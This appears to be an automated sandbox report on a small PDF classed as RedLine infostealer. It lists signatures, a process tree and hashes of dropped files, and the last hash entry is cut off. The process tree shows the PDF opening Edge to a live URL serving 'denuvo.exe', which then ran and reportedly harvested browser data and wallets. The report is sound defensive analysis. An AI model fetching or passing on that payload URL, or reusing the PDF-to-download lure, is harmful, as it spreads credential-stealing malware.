Overview

overview

10

Static

static

5

output.pdf

windows7-x64

3

output.pdf

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2025 21:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    output.pdf

  • Size

    1KB

  • MD5

    db3778162ef03444aaf68624f1be9f46

  • SHA1

    17a74c29ddad59a4c9a5d5b890424de9c1215f10

  • SHA256

    efc46388e00b249aa532bf7ef8e49648fbc5754fb515b1c221a0774ccdd89ae0

  • SHA512

    b77d5ab13eec233d626c04cd73c2e75610d6155f4bc770556d4ddff86bafe154be19255319dec81a30374010317f7fb928b95d321ff4e4de17ba1b30c4ca29e9

Score
10/10
redlinediscoveryinfostealerspywarestealer

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 2 IoCs
  • Redline family
    redline
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 8 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\output.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4612
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://195.177.92.19/denuvo.exe
      2⤵
      • Enumerates system info in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c6c46f8,0x7ffc0c6c4708,0x7ffc0c6c4718
        3⤵
          PID:3896
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
          3⤵
            PID:2092
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3900
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
            3⤵
              PID:5020
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
              3⤵
                PID:2956
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
                3⤵
                  PID:2432
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 /prefetch:8
                  3⤵
                    PID:1048
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 /prefetch:8
                    3⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4428
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5436 /prefetch:8
                    3⤵
                      PID:1660
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
                      3⤵
                        PID:4716
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6044 /prefetch:8
                        3⤵
                          PID:5172
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5392
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                          3⤵
                            PID:5948
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
                            3⤵
                              PID:5944
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
                              3⤵
                                PID:5420
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17804484642885711266,15496938621945855417,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
                                3⤵
                                  PID:5416
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1580
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C286B9534C3E85BEB11AB343C3853734 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3596
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EF5B1A0C60479C57D37DE7F34007A3B2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EF5B1A0C60479C57D37DE7F34007A3B2 --renderer-client-id=2 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job /prefetch:1
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3412
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B71446060156F58EB8E4E30161991971 --mojo-platform-channel-handle=2316 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3920
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=18E445E3CA726F42CE579C275D1D6EE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=18E445E3CA726F42CE579C275D1D6EE7 --renderer-client-id=5 --mojo-platform-channel-handle=1872 --allow-no-sandbox-job /prefetch:1
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4708
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A15699AE88A9E8740AECD84DAED90ED6 --mojo-platform-channel-handle=2524 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4600
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=582859192A90F81A91B589C9A809194F --mojo-platform-channel-handle=2900 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:756
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:1812
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:832
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:1556
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:6036
                                    • C:\Users\Admin\Downloads\denuvo.exe
                                      "C:\Users\Admin\Downloads\denuvo.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6096
                                    • C:\Users\Admin\Downloads\denuvo.exe
                                      "C:\Users\Admin\Downloads\denuvo.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4372

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                      Filesize

                                      56KB

                                      MD5

                                      752a1f26b18748311b691c7d8fc20633

                                      SHA1

                                      c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                      SHA256

                                      111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                      SHA512

                                      a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                                      Download Submit

                                    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                      Filesize

                                      64KB

                                      MD5

                                      d6bac4cabc12a76a0f2f5c360228c31f

                                      SHA1

                                      5ffd5250baf953eb8e5170e7db17c64d2879432b

                                      SHA256

                                      34be7a4efa3cd2fe6e2cfd7f52e4d15473b3eb1039217005a10206d7096cdcc8

                                      SHA512

                                      2b104a4051b1ce3f971225f02a947b474c3eeadd6fdd2b1ca9d1b84c22f028467267156d4f89dd52bee2b7c02ebee678b997dd31cd81b22c8049247618c09268

                                      Download Submit

                                    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                      Filesize

                                      36KB

                                      MD5

                                      b30d3becc8731792523d599d949e63f5

                                      SHA1

                                      19350257e42d7aee17fb3bf139a9d3adb330fad4

                                      SHA256

                                      b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                                      SHA512

                                      523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\denuvo.exe.log
                                      Filesize

                                      2KB

                                      MD5

                                      ea3aa54fd72e78c408541114b93a1008

                                      SHA1

                                      64ca84bb76eb46b859b5ad781cc474f767283a91

                                      SHA256

                                      a8dc6722e028e50293b0b03c6055b426043b1547b4697b989af76cb5ceec8abc

                                      SHA512

                                      a70d7dde435f6b5ec4f3bf3f25d1e6b03c7db6c1da627c08c1d385a892df9cb3519544c364867f49cc60fcf7bf8939315238d520d2a69d85b69ae8759cdb1590

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      fab8d8d865e33fe195732aa7dcb91c30

                                      SHA1

                                      2637e832f38acc70af3e511f5eba80fbd7461f2c

                                      SHA256

                                      1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

                                      SHA512

                                      39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      36988ca14952e1848e81a959880ea217

                                      SHA1

                                      a0482ef725657760502c2d1a5abe0bb37aebaadb

                                      SHA256

                                      d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

                                      SHA512

                                      d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      5KB

                                      MD5

                                      786bf672f064ddb05369885d2a63e0cb

                                      SHA1

                                      26d1adb401bc6e28ba617e86aba7ab490b546cbb

                                      SHA256

                                      1f0dc7bb7ab818b838e048449c80070d5ef6b04692b5d75a6cc266fb55204937

                                      SHA512

                                      f8e7bf5a892ddb8e2f1e1f1332f2840b5401e406c19c06d40514970fce82d533dbc8d5d64a137d4b36a614e9090619911d45ad3d8c940ff2ad5d5c61d5229d79

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      e53695565234caacfbcdc31d35d944af

                                      SHA1

                                      3463090dd70b905ea679a7769c03267d157ce9c4

                                      SHA256

                                      434e69e7ec24d8ad1be315287f4a4a410c2dc0d35387479f29043bd89ec6f973

                                      SHA512

                                      9416657f9c017248aea2b4dc3bdc4cc3084301693e36fe1a262a8453377d77d0b825927e54110fcf4948b43194a4d0df649b63661b50c12929a7d8ab040de94c

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                      Filesize

                                      16B

                                      MD5

                                      6752a1d65b201c13b62ea44016eb221f

                                      SHA1

                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                      SHA256

                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                      SHA512

                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      10KB

                                      MD5

                                      1ceae025bcbff45b0a1764e00a8c8479

                                      SHA1

                                      f3cd119c617c47d3d578eda4573eabed476292a4

                                      SHA256

                                      2fbbd27ec48dd416293856ec18407848db5c9185b4547d30a732d6aca8ebf22c

                                      SHA512

                                      6986ffca6f87aa83749661baab60af34f5c67d8657654033be35f3f8477898ccd6c706fd4628f86fae6d652c238644168651695135aee74f0049f8dee2884478

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      10KB

                                      MD5

                                      8bc39f1f7710d70a0c7b541f8c834d99

                                      SHA1

                                      9cb98b549f1410039c9029a39d1b89ad9516a6af

                                      SHA256

                                      285214f7e6955c062ca03e5f5992c3fa9abc777efd4dfd4c0e7ee0435d8f32b2

                                      SHA512

                                      56a63fed3d69c1b644d284b2f989c4150cff88806170f336e18c47b06bcc0daef49e40816c847303603d54a9a8cd639e3e5753e782dc86f8fb2f442919094e0c

                                      Download Submit

                                    • C:\Users\Admin\Downloads\Unconfirmed 632079.crdownload
                                      Filesize

                                      3.9MB

                                      MD5

                                      21e4d229e67971abede49de4d1c501d6

                                      SHA1

                                      9b688958f1a1932f34ce24abe8aa1355bf510cea

                                      SHA256

